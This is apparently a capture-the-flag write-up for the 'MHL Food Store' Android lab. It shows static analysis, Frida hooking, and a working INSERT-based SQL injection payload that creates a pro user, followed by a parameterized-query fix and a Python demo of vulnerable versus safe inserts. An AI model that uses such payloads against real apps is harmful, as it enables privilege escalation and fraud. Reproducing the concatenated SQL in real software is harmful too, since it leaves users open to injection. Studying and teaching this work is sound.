MHL - Food Store
Solution
Step 0: The task

Step 1: Static Analysis
We have three screens: Login, Signup and Main Activity.
In SignUpActivity, the user-creation call dbHelper.addUser(newUser) looks interesting.
Step 2: The bug
In LoginActivity, if the logged-in user is a pro user, the app sets 10k credits.
From DBHelper
The bug is an INSERT-based SQL injection in SQLite. It is a less common injection point than a SELECT, but exploitation is simple: the username is concatenated straight into the statement, so anything after the closing quote is parsed as SQL.
INSERT INTO users (username, password) VALUES ('my_user'MY_PAYLOAD, 'password')
Step 3: Dynamic Analysis
At this point we need to develop our payload. Luckily, the Frida script below hooks the SQLite functions, and create database, insert and select are all covered. https://codeshare.frida.re/@ninjadiary/sqlite-database/
I downloaded the script and ran it against the app to see the exact statements it executes.


There is a single injection point: username. Password and address are base64-encoded before being saved to the database, so the injected values for those columns must be base64 as well (cHdkMQ== decodes to "pwd1", YWRkcmVzcyAx to "address 1").
First try
Payload in the username text box:
user2','cHdkMQ==', 'YWRkcmVzcyAx',1)--
The statement becomes:
INSERT INTO users (username, password, address, isPro) VALUES ('user2','cHdkMQ==', 'YWRkcmVzcyAx',1)--', 'cHdkMQ==', 'YWRkcmVzcyAx', 0)

This fails, most likely because a -- comment in SQLite only runs to the end of the line: if the app builds its statement across several lines, the remainder of the original statement on the next line is still parsed and is a syntax error.

Second try
Payload:
user2','cHdkMQ==', 'YWRkcmVzcyAx',1);--
The statement becomes:
INSERT INTO users (username, password, address, isPro) VALUES ('user2','cHdkMQ==', 'YWRkcmVzcyAx',1);--', 'cHdkMQ==', 'YWRkcmVzcyAx', 0)
Terminating the injected INSERT with a semicolon makes it a complete statement on its own. The Android SQLite wrapper compiles only the first statement in the string and ignores whatever follows, so the commented-out remainder no longer matters.
Result

user2 is added with isPro set to 1, and after logging in we get the 10k credits. 👏

Behind the scenes, look at the record in the database.

The fix
Use parameterized statements for every value, never string concatenation. On Android that means SQLiteDatabase.insert() with ContentValues, execSQL(String, Object[]) with bind arguments, or compileStatement() with bindString(); the Android docs are good enough: https://developer.android.com/reference/java/sql/PreparedStatement
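The vulnerable concatenation beside its parameterized replacement, as an added example that is not the app's code, run with Python's sqlite3 module against the same SQLite engine. The table layout, the column types and the single-line form of the app's statement are assumptions; the payload and the base64 values are the ones from the writeup.

```python
import base64
import sqlite3

# Added example, not the app's code. Column names follow the writeup; the
# column types and the exact text of the app's statement are assumptions.
SCHEMA = """
CREATE TABLE users (
    username TEXT NOT NULL,
    password TEXT NOT NULL,
    address  TEXT NOT NULL,
    isPro    INTEGER NOT NULL DEFAULT 0
)
"""

# The working payload from the writeup, typed into the username field.
PAYLOAD = "user2','cHdkMQ==', 'YWRkcmVzcyAx',1);--"


def b64(text: str) -> str:
    """Mimic the app: password and address are base64-encoded before storage."""
    return base64.b64encode(text.encode()).decode()


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def add_user_vulnerable(conn, username, password, address) -> str:
    """String-built INSERT: only username goes in raw, as in the app.

    Assumption: the statement is on a single line. With a multi-line statement
    the ')--' variant of the payload fails, because the -- comment stops at the
    newline and the rest of the original statement is still parsed.
    """
    sql = (
        "INSERT INTO users (username, password, address, isPro) VALUES ('"
        + username + "', '" + b64(password) + "', '" + b64(address) + "', 0)"
    )
    conn.execute(sql)
    conn.commit()
    return sql


def add_user_safe(conn, username, password, address) -> None:
    """Parameterized INSERT: the payload is stored as a literal username."""
    conn.execute(
        "INSERT INTO users (username, password, address, isPro) VALUES (?, ?, ?, 0)",
        (username, b64(password), b64(address)),
    )
    conn.commit()


def lookup(conn, username):
    return conn.execute(
        "SELECT username, password, address, isPro FROM users WHERE username = ?",
        (username,),
    ).fetchone()


def demo() -> dict:
    vuln = new_db()
    add_user_vulnerable(vuln, PAYLOAD, "whatever", "ignored")
    safe = new_db()
    add_user_safe(safe, PAYLOAD, "whatever", "ignored")
    return {
        # injected row: attacker-chosen password/address and isPro = 1
        "injected": lookup(vuln, "user2"),
        # the values the app meant to store never reached the table
        "vuln_rows": vuln.execute("SELECT count(*) FROM users").fetchone()[0],
        # parameterized: the whole payload is the username and isPro stays 0
        "literal": lookup(safe, PAYLOAD),
        # the base64 strings carried in the payload
        "decoded": (
            base64.b64decode("cHdkMQ==").decode(),
            base64.b64decode("YWRkcmVzcyAx").decode(),
        ),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Running it, the vulnerable path returns the injected row with isPro = 1, while the parameterized insert stores the entire payload as the username with isPro = 0. One caveat about the simulation: Python's sqlite3 refuses any non-comment text left over after the first statement, which is why the statement is kept on one line here; the Android wrapper silently ignores that tail instead, which is what made the ;-- payload work in the app.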
